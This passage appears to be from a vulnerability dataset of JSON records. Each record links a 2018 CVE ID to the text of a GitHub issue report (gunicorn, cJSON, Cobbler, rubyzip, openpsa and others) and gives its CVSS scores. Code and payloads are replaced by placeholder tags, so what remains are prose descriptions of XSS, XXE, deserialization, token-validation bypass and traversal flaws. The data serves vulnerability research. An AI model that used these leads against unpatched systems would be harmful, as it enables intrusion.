  16708. "CVE_ID": "CVE-2018-1000164",
  16709. "Issue_Url_old": "https://github.com/benoitc/gunicorn/issues/1227",
  16710. "Issue_Url_new": "https://github.com/benoitc/gunicorn/issues/1227",
  16711. "Repo_new": "benoitc/gunicorn",
  16712. "Issue_Created_At": "2016-03-17T13:40:41Z",
  16713. "description": "Potential HTTP Response Splitting Vulnerability. This FILETAG was recently reported to and fixed in both waitress (WSGI server) URLTAG and APITAG URLTAG (and waitress has an outstanding issues URLTAG to discuss further possible vulnerabilities). I also made changes to gevent URLTAG for these issues. gunicorn seems to be partly (but not entirely) vulnerable to these issues as well, across at least the sync and gevent workers. Here are three apps, each producing different kinds of bad output. The badvalue case (invalid values in the header values) is probably the most likely injection vulnerability, with the next being the badname case (invalid value in the header names) and the least likely being the badstatus case (invalid value in the status line): CODETAG Here's what happens hitting badvalue . We get a bunch of duplicate headers that might confuse clients: ERRORTAG Here's what happens hitting badname . The worst I was able to do was produce malformed HTTP; on other servers I was able to cause clients to hang, but I haven't reproduced that with gunicorn (yet): ERRORTAG Finally, here's badstatus . Here, we completely override the rest of the response: APITAG Should gunicorn check for and raise exceptions for these type of malformed values in APITAG ?",
  16714. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  16715. "severity": "HIGH",
  16716. "baseScore": 7.5,
  16717. "impactScore": 3.6,
  16718. "exploitabilityScore": 3.9
  16719. },
  16720. {
  16721. "CVE_ID": "CVE-2018-1000211",
  16722. "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper/issues/891",
  16723. "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper/issues/891",
  16724. "Repo_new": "doorkeeper-gem/doorkeeper",
  16725. "Issue_Created_At": "2016-10-05T13:00:29Z",
  16726. "description": "Revoking token does not work for public clients. Hello, I'm using grant implicit to allow authorizing an application from mobile applications: APITAG After a successful oauth flow, the generated token is saved in the APITAG table jointly with the application referenced by the original APITAG request: CODETAG The APITAG is empty, as expected since using implicit . When I try to revoke this token using the POST /oauth/revoke API endpoint URLTAG (the one at the bottom, which does not require APITAG or APITAG to be passed), it does not get revoked. Diving into the source code, I see in the APITAG : ERRORTAG However, as per above the token _does_ specify the APITAG , despite having used the implicit grant type. Hence, when I try to revoke this token I land in the controller's authorized? method URLTAG : ERRORTAG Where APITAG is nil , hence authorized? returns false and the token does not get revoked. Is this expected behavior?",
  16727. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  16728. "severity": "HIGH",
  16729. "baseScore": 7.5,
  16730. "impactScore": 3.6,
  16731. "exploitabilityScore": 3.9
  16732. },
  16733. {
  16734. "CVE_ID": "CVE-2018-1000216",
  16735. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/241",
  16736. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/241",
  16737. "Repo_new": "davegamble/cjson",
  16738. "Issue_Created_At": "2018-02-07T07:51:36Z",
  16739. "description": "Memory issues when printing APITAG I was taking a look at the cJSON codebase on behalf of a customer, and I noticed a couple of things that I wanted to check when printing APITAG values: If item >valuestring is NULL, the APITAG implementation may deallocate the write buffer and then return URLTAG . However, at least some callers of APITAG (for example APITAG will also deallocate this buffer on failure. This looks like a potential double free. If item >valuestring is not NULL, APITAG ensures the buffer is long enough to receive it and then memcpys the string length into the buffer URLTAG . This means the buffer is not NULL terminated. As it happens, if realloc is not available and APITAG was the caller of APITAG then it will null terminate the buffer \" just to be sure URLTAG \". But in any other case I think this string will not be null terminated, unless the malloced memory happened to be zero. I haven't had time to verify this for certain, or write tests, but I thought I would report it while I had it in front of me.",
  16740. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16741. "severity": "HIGH",
  16742. "baseScore": 8.8,
  16743. "impactScore": 5.9,
  16744. "exploitabilityScore": 2.8
  16745. },
  16746. {
  16747. "CVE_ID": "CVE-2018-1000217",
  16748. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/248",
  16749. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/248",
  16750. "Repo_new": "davegamble/cjson",
  16751. "Issue_Created_At": "2018-03-01T18:15:13Z",
  16752. "description": "String deallocated before use. Maybe I'm doing things in a dumb way, but given the method I'm using, there's a problem with the function APITAG What I want to do is to parse a number of separate .json files and merge their contents into a single cJSON object. The files may partially duplicate each other. Objects and array items that are already in the result that is being constructed should be skipped during the processing of a .json file, i.e. no duplicate objects or array elements are permitted in the result output. So, at the top level each file contains one object (always with the same name, \"stuff\" in the simplified examples below), which in turn contains other objects, which contain arrays of objects. A simple example will illustrate what I want to achieve. .json file NUMBERTAG CODETAG .json file NUMBERTAG CODETAG I want the result of the merge operation to be a cJSON object that represents the following .json: CODETAG First, I use APITAG to start my result object. Then I process each .json file in turn, using APITAG to create a cJSON object that represents the file. Then this cJSON object is examined, and if any \"stuff\" is found, it is moved to the result object, except such objects/array elements as are already present there. Here is a code snippet that shows how I handle the merge operation for an object at the level directly under \"stuff\" that is not yet present at all in the result: CODETAG APITAG is a cJSON object from the current .json file, representing for example \"BAZ\" from the .json files above. I want to move that object from the cJSON object representing the .json file APITAG to the cJSON result object under construction APITAG The problem is that the internal function APITAG in cJSON assumes that its _string_ argument is valid throughout the function. 
But when I use APITAG >string_, that assumption becomes false, because that string is deallocated before a copy is made and inserted in the item before it's added to the target object. The result (at best) is that the item string will contain garbage. Perhaps the order of actions in APITAG could be rearranged, so that a copy of the _string_ argument is made before any deallocations? Of course, I could allocate memory and make a copy of the string in my own code, but that seems a bit silly. Maybe my method is naive, and a there is a better way of doing what I want that does not run into this kind of problem? If so, please let me know. I'm relatively new to cJSON.",
  16753. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16754. "severity": "CRITICAL",
  16755. "baseScore": 9.8,
  16756. "impactScore": 5.9,
  16757. "exploitabilityScore": 3.9
  16758. },
  16759. {
  16760. "CVE_ID": "CVE-2018-1000218",
  16761. "Issue_Url_old": "https://github.com/openemr/openemr/issues/1781",
  16762. "Issue_Url_new": "https://github.com/openemr/openemr/issues/1781",
  16763. "Repo_new": "openemr/openemr",
  16764. "Issue_Created_At": "2018-07-25T15:32:47Z",
  16765. "description": "APITAG NUMBERTAG Cross Site Scripting in PATHTAG I found an application security issue in PATHTAG of APITAG NUMBERTAG and likely earlier versions. The vulnerability exists due to a lack of sanitation of user supplied input. The vulnerability allows attackers to execute javascript on remotely authenticated users via the 'file' and 'scan' parameters. Proof of Concept URL 'file' parameter: URLTAG Proof of Concept URL 'scan' parameter: URLTAG",
  16766. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  16767. "severity": "MEDIUM",
  16768. "baseScore": 5.4,
  16769. "impactScore": 2.7,
  16770. "exploitabilityScore": 2.3
  16771. },
  16772. {
  16773. "CVE_ID": "CVE-2018-1000222",
  16774. "Issue_Url_old": "https://github.com/libgd/libgd/issues/447",
  16775. "Issue_Url_new": "https://github.com/libgd/libgd/issues/447",
  16776. "Repo_new": "libgd/libgd",
  16777. "Issue_Created_At": "2018-07-14T17:12:59Z",
  16778. "description": "APITAG possible double free bug . Possible double free bug same as CVETAG exists for ` function. CODETAG MENTIONTAG",
  16779. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16780. "severity": "HIGH",
  16781. "baseScore": 8.8,
  16782. "impactScore": 5.9,
  16783. "exploitabilityScore": 2.8
  16784. },
  16785. {
  16786. "CVE_ID": "CVE-2018-1000224",
  16787. "Issue_Url_old": "https://github.com/godotengine/godot/issues/20558",
  16788. "Issue_Url_new": "https://github.com/godotengine/godot/issues/20558",
  16789. "Repo_new": "godotengine/godot",
  16790. "Issue_Created_At": "2018-07-29T01:55:55Z",
  16791. "description": "Godot serialization security issues. Godot version: Any version of Godot since I could trace NUMBERTAG when it was open sourced) OS/device including version: Any Issue description: Few weeks ago, I noticed by chance that passing a specific array of bytes to APITAG PATHTAG class gdscript bytes2var crashed the engine. (in NUMBERTAG APITAG ). After further investigations I realised that the (de)serialization code hadn't seen love in a while, so I went for a full audit and found out there were actually a few more issues. The main issues were: Crash due to unbound allocation : Array types sometimes didn't have the right size check (due to incorrect signed/unsigned comparison), causing the engine to try to allocate huge amount of memory and being terminated by the OS. Read buffer overflow : Some types had incorrect size checks potentially causing buffer overflow during reading. Leak of memory content : Some strings padding were not correctly zeroized, potentially causing freed but not cleared internal memory disclosure over network (although be reassured by the fact that crypto libs like APITAG and APITAG does clear their memory when freeing things like private key and so on). I decided to privately contact few other developers ( MENTIONTAG MENTIONTAG MENTIONTAG APITAG and we agreed to embargo this issue while we worked on a fix. If you are reading this, patches are already available (so this issue is actually closed), and updated binaries are available for download at the official Godot website URLTAG . Steps to reproduce: Run a script that executes NUMBERTAG APITAG Minimal reproduction project: Please see this testing project URLTAG I made to perform automatic tests. Afterword First, I would like to thank all the devs involved, who helped me a lot during the development of the fix, and stayed online on weekends to do the releases. 
In my humble opinion, this incident, along with the history of this engine, clearly shows how source code availability and great communities like this one, can improve software quality with concrete benefits to everyone. From a security perspective, responsible disclosure is, in my opinion, the best road to security. In this sense, in the coming month we will be working on setting up guidelines and procedures in case anyone discovers a new security issue. In the meantime, I invite everyone with a passion in security, to try and break our engine, the network code, the serialization process. If you find anything, let us know here on Github or on IRC at godotengine devel , we won't sue you, we will actually thank you :heart:",
  16792. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16793. "severity": "HIGH",
  16794. "baseScore": 7.5,
  16795. "impactScore": 3.6,
  16796. "exploitabilityScore": 3.9
  16797. },
  16798. {
  16799. "CVE_ID": "CVE-2018-1000225",
  16800. "Issue_Url_old": "https://github.com/cobbler/cobbler/issues/1917",
  16801. "Issue_Url_new": "https://github.com/cobbler/cobbler/issues/1917",
  16802. "Repo_new": "cobbler/cobbler",
  16803. "Issue_Created_At": "2018-08-02T14:57:32Z",
  16804. "description": "Persistent XSS vulnerability in cobbler web. cobbler web renders HTML and executes APITAG payloads that are provided by users. Combined with authentication problems in the Cobbler XMLRPC API URLTAG , this allows unauthenticated users to inject malicious payloads into the web UI. A harmless Proof of Concept script: ERRORTAG Then when you visit the APITAG endpoint: FILETAG These payloads can be used to hijack the sessions of administrators and perform actions that the attacker would otherwise be unable to, or to exfiltrate sensitive information. cobbler web should sanitize all user provided inputs, and treat them as untrusted. This includes never rendering user provided HTML, nor executing user provided APITAG See this post URLTAG for more discussion.",
  16805. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16806. "severity": "MEDIUM",
  16807. "baseScore": 6.1,
  16808. "impactScore": 2.7,
  16809. "exploitabilityScore": 2.8
  16810. },
  16811. {
  16812. "CVE_ID": "CVE-2018-1000226",
  16813. "Issue_Url_old": "https://github.com/cobbler/cobbler/issues/1916",
  16814. "Issue_Url_new": "https://github.com/cobbler/cobbler/issues/1916",
  16815. "Repo_new": "cobbler/cobbler",
  16816. "Issue_Created_At": "2018-08-02T14:55:55Z",
  16817. "description": "Many XMLRPC API endpoints are not correctly validating security tokens. Looking at Cobbler's XMLRPC API, there are many places where the user supplied security token is not being correctly validated, effectively resulting in authentication being bypassed. Using some quick and dirty FILETAG , I discovered that there are no fewer than NUMBERTAG other endpoints that require a security token but don't actually use it! This means that unauthenticated users are able to perform all sorts of actions that they should not be able to. Example For example, the APITAG endpoint allows users to upload files to the server. As this is a dangerous action, there is a flag in APITAG that must be explicitly enabled before this functionality becomes available: From APITAG URLTAG : yaml NOTE: This does allow an xmlrpc call to send logs to this directory, without authentication, so enable only if you are ok with this limitation. anamon_enabled NUMBERTAG However, authenticated users can also change this setting in a running server using the APITAG endpoint in the XMLRPC API. APITAG But the actual implementation of the endpoint never validates the value of the token parameter, so any value works: CODETAG So it doesn't matter whether the server operator is \"ok with this limitation\", since unauthenticated users can change the value at any time. Conclusion There are many other potentially harmful endpoints in the API, and many more creative ways to exploit them. The Cobbler XMLRPC API needs to be carefully examined with security in mind to make sure that all of the API endpoints are validating their security tokens correctly. In the meantime, consider using a firewall to restrict/disable access to the APITAG endpoint. See this post URLTAG for more discussion.",
  16818. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16819. "severity": "CRITICAL",
  16820. "baseScore": 9.8,
  16821. "impactScore": 5.9,
  16822. "exploitabilityScore": 3.9
  16823. },
  16824. {
  16825. "CVE_ID": "CVE-2018-1000520",
  16826. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/1561",
  16827. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/1561",
  16828. "Repo_new": "mbed-tls/mbedtls",
  16829. "Issue_Created_At": "2018-04-06T09:11:15Z",
  16830. "description": "TLS ECDH RSA Ciphersuites Allow ECDSA Signed Certificates. Description Type: Bug Bug mbed TLS build: Version NUMBERTAG I assume it's also present in the newest build, as well as the previous ones) When the negotiated ciphersuite is of the type TLS ECDH RSA (ECDH key exchange + RSA signed certificate), ECDSA signed certificates are accepted, which means that the ciphersuite technically becomes TLS ECDH ECDSA. FILETAG states that in an ECDH_RSA key exchange, the certificate MUST be signed with RSA. Proof Of Concept Due to lack of time, I don't have time to submit a \"pretty\" POF, but here goes a sample client and server program. The client and the server accept a single argument: the id of the ciphersuite to use. You can use APITAG ( APITAG ), for example. Here are the sources: FILETAG FILETAG Simply compile both (if you place them in the APITAG directory and add the executables in APITAG it should work fine NUMBERTAG Compile NUMBERTAG Run APITAG NUMBERTAG Run APITAG NUMBERTAG Confirm that the connection is successful. Note that the server is using the certificate (it's printed out to the console): CODETAG which is signed with APITAG",
  16831. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  16832. "severity": "HIGH",
  16833. "baseScore": 7.5,
  16834. "impactScore": 3.6,
  16835. "exploitabilityScore": 3.9
  16836. },
  16837. {
  16838. "CVE_ID": "CVE-2018-1000523",
  16839. "Issue_Url_old": "https://github.com/bram85/topydo/issues/240",
  16840. "Issue_Url_new": "https://github.com/topydo/topydo/issues/240",
  16841. "Repo_new": "topydo/topydo",
  16842. "Issue_Created_At": "2018-05-13T03:44:39Z",
  16843. "description": "Unexpected behaviour of topydo when tasks contain backslashes. topydo passes TODO texts as the repl argument of APITAG unchanged at PATHTAG If an issue contains a backslash, it is thus interpreted as an escape: an issue containing APITAG will output only foo . This can also lead to crashing topydo : APITAG will trigger a crash This, finally, also means that the TODO task can output whatever bytes it wants to the terminal without any check from topydo, thus potentially opening the way to exploiting a flaw in the terminal's escape code handling from untrusted FILETAG files (eg. automatically generated from untrusted sources, like code). (the attack path here looks rather narrow to me, though): APITAG outputs APITAG APITAG makes bar blink APITAG erases the previous TODO on the list (in topydo ls output) and replaces it by \u201cyou didn't see this\u201d etc.",
  16844. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  16845. "severity": "HIGH",
  16846. "baseScore": 8.1,
  16847. "impactScore": 5.2,
  16848. "exploitabilityScore": 2.8
  16849. },
  16850. {
  16851. "CVE_ID": "CVE-2018-1000525",
  16852. "Issue_Url_old": "https://github.com/flack/openpsa/issues/191",
  16853. "Issue_Url_new": "https://github.com/flack/openpsa/issues/191",
  16854. "Repo_new": "flack/openpsa",
  16855. "Issue_Created_At": "2018-05-29T13:28:00Z",
  16856. "description": "PHP Object Deserialization. Issue An attacker can perform PHP object serialization attacks, which can possibly lead to remote code execution. Vulnerable Section URLTAG The code above displays that base NUMBERTAG encoded GET arguments are unserialized without being sanitised, which causes PHP object serialization attacks.",
  16857. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16858. "severity": "CRITICAL",
  16859. "baseScore": 9.8,
  16860. "impactScore": 5.9,
  16861. "exploitabilityScore": 3.9
  16862. },
  16863. {
  16864. "CVE_ID": "CVE-2018-1000526",
  16865. "Issue_Url_old": "https://github.com/flack/openpsa/issues/192",
  16866. "Issue_Url_new": "https://github.com/flack/openpsa/issues/192",
  16867. "Repo_new": "flack/openpsa",
  16868. "Issue_Created_At": "2018-05-29T13:47:14Z",
  16869. "description": "XML APITAG Attack. The Issue A specially crafted XML file can be used to create a denial of service scenario within the openpsa admin portal. Vulnerable Code URLTAG The above code displays that an XML file is being parsed. URLTAG The code above displays that the XML file is user controlled. This can allow an attacker to create a denial of service scenario for all versions of PHP prior to NUMBERTAG Minimum PHP requirements for openpsa project: URLTAG CVE for vulnerable PHP function: URLTAG",
  16870. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16871. "severity": "HIGH",
  16872. "baseScore": 7.5,
  16873. "impactScore": 3.6,
  16874. "exploitabilityScore": 3.9
  16875. },
  16876. {
  16877. "CVE_ID": "CVE-2018-1000527",
  16878. "Issue_Url_old": "https://github.com/Froxlor/Froxlor/issues/555",
  16879. "Issue_Url_new": "https://github.com/froxlor/froxlor/issues/555",
  16880. "Repo_new": "froxlor/froxlor",
  16881. "Issue_Created_At": "2018-05-29T12:56:06Z",
  16882. "description": "PHP Object Serialisation Bug. Summary An attacker with administrative privileges can perform PHP object serialisation attacks, which can possibly lead to remote code execution. System information Froxlor version NUMBERTAG Web server: apache2 DNS server: Bind POP/IMAP server: Courier SMTP server: postfix FTP server: proftpd APITAG Ubuntu Vulnerable Section URLTAG An administrator user can create a new domain and use the code above to deserialise a PHP object, running its magic methods to execute PHP commands on the server. This may lead to remote code execution",
  16883. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  16884. "severity": "HIGH",
  16885. "baseScore": 7.2,
  16886. "impactScore": 5.9,
  16887. "exploitabilityScore": 1.2
  16888. },
  16889. {
  16890. "CVE_ID": "CVE-2018-1000528",
  16891. "Issue_Url_old": "https://github.com/gosa-project/gosa-core/issues/14",
  16892. "Issue_Url_new": "https://github.com/gosa-project/gosa-core/issues/14",
  16893. "Repo_new": "gosa-project/gosa-core",
  16894. "Issue_Created_At": "2018-05-23T12:03:11Z",
  16895. "description": "Server Side Reflected XSS via POST to FILETAG . APITAG here as requested by Gonicus) The FILETAG endpoint fails to sanitize the uid POST parameter, leading to a Server Side Reflected XSS vulnerability as this parameter is later assigned to a Smarty variable of the same name and then rendered in the context of an HTML attribute in APITAG . As a result, arbitrary APITAG can be executed in the GOSA origin. This vulnerability is very similar to the one reported as CVETAG URLTAG , but uses a different endpoint. Suggested fix (untested): Use APITAG to escape the value of uid before assigning it to the Smarty variable here URLTAG .",
  16896. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16897. "severity": "MEDIUM",
  16898. "baseScore": 6.1,
  16899. "impactScore": 2.7,
  16900. "exploitabilityScore": 2.8
  16901. },
  16902. {
  16903. "CVE_ID": "CVE-2018-1000529",
  16904. "Issue_Url_old": "https://github.com/grails-fields-plugin/grails-fields/issues/278",
  16905. "Issue_Url_new": "https://github.com/grails-fields-plugin/grails-fields/issues/278",
  16906. "Repo_new": "grails-fields-plugin/grails-fields",
  16907. "Issue_Created_At": "2018-05-24T12:04:00Z",
  16908. "description": "XSS vulnerability when rendering f:display for beans . From MENTIONTAG We've received a XSS vulnerability report that it's caused by the Fields plugin. It's pretty easy to reproduce the issue (the user also provided a sample project), just a domain class with a String property with the value APITAG . Then using the default scaffolding the alert is displayed in both list and show pages.",
  16909. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16910. "severity": "MEDIUM",
  16911. "baseScore": 6.1,
  16912. "impactScore": 2.7,
  16913. "exploitabilityScore": 2.8
  16914. },
  16915. {
  16916. "CVE_ID": "CVE-2018-1000531",
  16917. "Issue_Url_old": "https://github.com/inversoft/prime-jwt/issues/3",
  16918. "Issue_Url_new": "https://github.com/fusionauth/fusionauth-jwt/issues/3",
  16919. "Repo_new": "fusionauth/fusionauth-jwt",
  16920. "Issue_Created_At": "2018-05-02T13:11:59Z",
  16921. "description": "JWT signature validation can be bypassed in versions NUMBERTAG Summary The prime jwt implementation allows that any not signed JWT be decoded and, therefore, validated by APITAG class, even when a Verifier object is provided. This issue affects versions NUMBERTAG For security reasons, I'm contacting the developers by email with the necessary technical details. Description When the APITAG APITAG is called, the JWT signature will be ignored due to a lack of validation in APITAG A new condition should be added in this class to prevent that any APITAG without the signature part be decoded if exists at least NUMBERTAG erifier_ object.",
  16922. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  16923. "severity": "HIGH",
  16924. "baseScore": 7.5,
  16925. "impactScore": 3.6,
  16926. "exploitabilityScore": 3.9
  16927. },
  16928. {
  16929. "CVE_ID": "CVE-2018-1000532",
  16930. "Issue_Url_old": "https://github.com/johnath/beep/issues/11",
  16931. "Issue_Url_new": "https://github.com/johnath/beep/issues/11",
  16932. "Repo_new": "johnath/beep",
  16933. "Issue_Created_At": "2018-04-03T11:34:26Z",
  16934. "description": "CVETAG . Just a short heads up: CVETAG",
  16935. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  16936. "severity": "MEDIUM",
  16937. "baseScore": 4.7,
  16938. "impactScore": 3.6,
  16939. "exploitabilityScore": 1.0
  16940. },
  16941. {
  16942. "CVE_ID": "CVE-2018-1000534",
  16943. "Issue_Url_old": "https://github.com/laurent22/joplin/issues/500",
  16944. "Issue_Url_new": "https://github.com/laurent22/joplin/issues/500",
  16945. "Repo_new": "laurent22/joplin",
  16946. "Issue_Created_At": "2018-05-08T11:54:40Z",
  16947. "description": "Vulnerability report please contact. I would like to report a vulnerability. Could you please contact me on EMAILTAG as I did not manage to find any e mail from your repo to contact you. Best, Silvia",
  16948. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16949. "severity": "MEDIUM",
  16950. "baseScore": 6.1,
  16951. "impactScore": 2.7,
  16952. "exploitabilityScore": 2.8
  16953. },
  16954. {
  16955. "CVE_ID": "CVE-2018-1000535",
  16956. "Issue_Url_old": "https://github.com/lmsgit/lms/issues/1271",
  16957. "Issue_Url_new": "https://github.com/chilek/lms/issues/1271",
  16958. "Repo_new": "chilek/lms",
  16959. "Issue_Created_At": "2018-05-29T14:29:46Z",
  16960. "description": "Arbitrary File Read. The Issue An attacker can arbitrarily read files (which the user running the web application has permission to read) using unsanitised user input passed to the fopen PHP function Where the Issue Occurred An attacker can control the file path for reading a file using the variable assignment below: URLTAG The above variable is passed to the line below, where the fopen function is being used to read the file: URLTAG As displayed above, APITAG is appended to the file name, however this can be bypassed (in some versions of PHP) using a null byte terminator NUMBERTAG",
  16961. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  16962. "severity": "HIGH",
  16963. "baseScore": 7.5,
  16964. "impactScore": 3.6,
  16965. "exploitabilityScore": 3.9
  16966. },
  16967. {
  16968. "CVE_ID": "CVE-2018-1000536",
  16969. "Issue_Url_old": "https://github.com/luin/medis/issues/109",
  16970. "Issue_Url_new": "https://github.com/luin/medis/issues/109",
  16971. "Repo_new": "luin/medis",
  16972. "Issue_Created_At": "2017-12-01T09:42:45Z",
  16973. "description": "XSS to code execution vulnerability. Hello, I would like to report a XSS vulnerability in your application that leads to code execution. I have a working poc that I dont want to post publicly. Please contact me at EMAILTAG",
  16974. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16975. "severity": "MEDIUM",
  16976. "baseScore": 6.1,
  16977. "impactScore": 2.7,
  16978. "exploitabilityScore": 2.8
  16979. },
  16980. {
  16981. "CVE_ID": "CVE-2018-1000540",
  16982. "Issue_Url_old": "https://github.com/oswetto/LoboEvolution/issues/38",
  16983. "Issue_Url_new": "https://github.com/loboevolution/loboevolution/issues/38",
  16984. "Repo_new": "loboevolution/loboevolution",
  16985. "Issue_Created_At": "2018-04-23T09:28:34Z",
  16986. "description": "XXE Security Vulnerability within XML File Parsing Function. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The line of code given below creates an XML parser for parsing an XML file opened and parses the data within: URLTAG This parsing is done in an insecure manner and does not prohibit the usage of XML external entities. This allows attackers to do the above mentioned attacks on a targeted user. Attack Scenario An attacker can simply give a APITAG user an XML file (or maybe the user downloads the file off an untrusted website). The user then opens the file in the browser and triggers the XML parser, causing the vulnerability to be triggered. APITAG File APITAG",
  16987. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16988. "severity": "HIGH",
  16989. "baseScore": 7.8,
  16990. "impactScore": 5.9,
  16991. "exploitabilityScore": 1.8
  16992. },
  16993. {
  16994. "CVE_ID": "CVE-2018-1000542",
  16995. "Issue_Url_old": "https://github.com/raydac/netbeans-mmd-plugin/issues/45",
  16996. "Issue_Url_new": "https://github.com/raydac/netbeans-mmd-plugin/issues/45",
  16997. "Repo_new": "raydac/netbeans-mmd-plugin",
  16998. "Issue_Created_At": "2018-05-29T14:10:54Z",
  16999. "description": "XXE in file import. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occured The parser parses mind map files (which is XML) without proper protections within the parsing function. URLTAG The parsing module is called from the function below: URLTAG A specially crafted mind map file can exploit this XXE issue.",
  17000. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  17001. "severity": "HIGH",
  17002. "baseScore": 7.8,
  17003. "impactScore": 5.9,
  17004. "exploitabilityScore": 1.8
  17005. },
  17006. {
  17007. "CVE_ID": "CVE-2018-1000543",
  17008. "Issue_Url_old": "https://github.com/rockiger/akiee/issues/42",
  17009. "Issue_Url_new": "https://github.com/rockiger/akiee/issues/42",
  17010. "Repo_new": "rockiger/akiee",
  17011. "Issue_Created_At": "2018-05-17T23:09:11Z",
  17012. "description": "FILETAG FILETAG Expected behavior This cross site scripting vulnerability allows an attacker to execute arbitrary code on the victims machine by tricking his victim into opening a crafted FILETAG that looks like this ERRORTAG In the worst case this will lead to a reverse shell. I am not going to paste the code for the reverse shell here for obvious reasons.",
  17013. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17014. "severity": "MEDIUM",
  17015. "baseScore": 6.1,
  17016. "impactScore": 2.7,
  17017. "exploitabilityScore": 2.8
  17018. },
  17019. {
  17020. "CVE_ID": "CVE-2018-1000544",
  17021. "Issue_Url_old": "https://github.com/rubyzip/rubyzip/issues/369",
  17022. "Issue_Url_new": "https://github.com/rubyzip/rubyzip/issues/369",
  17023. "Repo_new": "rubyzip/rubyzip",
  17024. "Issue_Created_At": "2018-06-14T18:41:06Z",
  17025. "description": "Several directory traversal vulnerabilities. Overview This issue is similar to already closed URLTAG but I found two ways to bypass that fix. You can find files for tests in URLTAG Proof of concept: rubyzip.rb CODETAG NUMBERTAG Files with absolute path APITAG strips absolute path ERRORTAG rubyzip extracts files with absolute path CODETAG NUMBERTAG Archive with symbolic link APITAG extracts only symbolic link ERRORTAG rubyzip extracts symbolic link and puts file into APITAG folder CODETAG Vulnerable version and test environment ERRORTAG ERRORTAG",
  17026. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17027. "severity": "CRITICAL",
  17028. "baseScore": 9.8,
  17029. "impactScore": 5.9,
  17030. "exploitabilityScore": 3.9
  17031. },
  17032. {
  17033. "CVE_ID": "CVE-2018-1000546",
  17034. "Issue_Url_old": "https://github.com/triplea-game/triplea/issues/3442",
  17035. "Issue_Url_new": "https://github.com/triplea-game/triplea/issues/3442",
  17036. "Repo_new": "triplea-game/triplea",
  17037. "Issue_Created_At": "2018-05-29T14:05:02Z",
  17038. "description": "XXE in Game Parser. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occured URLTAG The above code parses a game file. A sample game file can be found at: FILETAG To exploit this issue, import the following XML code: APITAG",
  17039. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  17040. "severity": "HIGH",
  17041. "baseScore": 7.8,
  17042. "impactScore": 5.9,
  17043. "exploitabilityScore": 1.8
  17044. },
  17045. {
  17046. "CVE_ID": "CVE-2018-1000559",
  17047. "Issue_Url_old": "https://github.com/qutebrowser/qutebrowser/issues/4011",
  17048. "Issue_Url_new": "https://github.com/qutebrowser/qutebrowser/issues/4011",
  17049. "Repo_new": "qutebrowser/qutebrowser",
  17050. "Issue_Created_At": "2018-06-21T16:07:19Z",
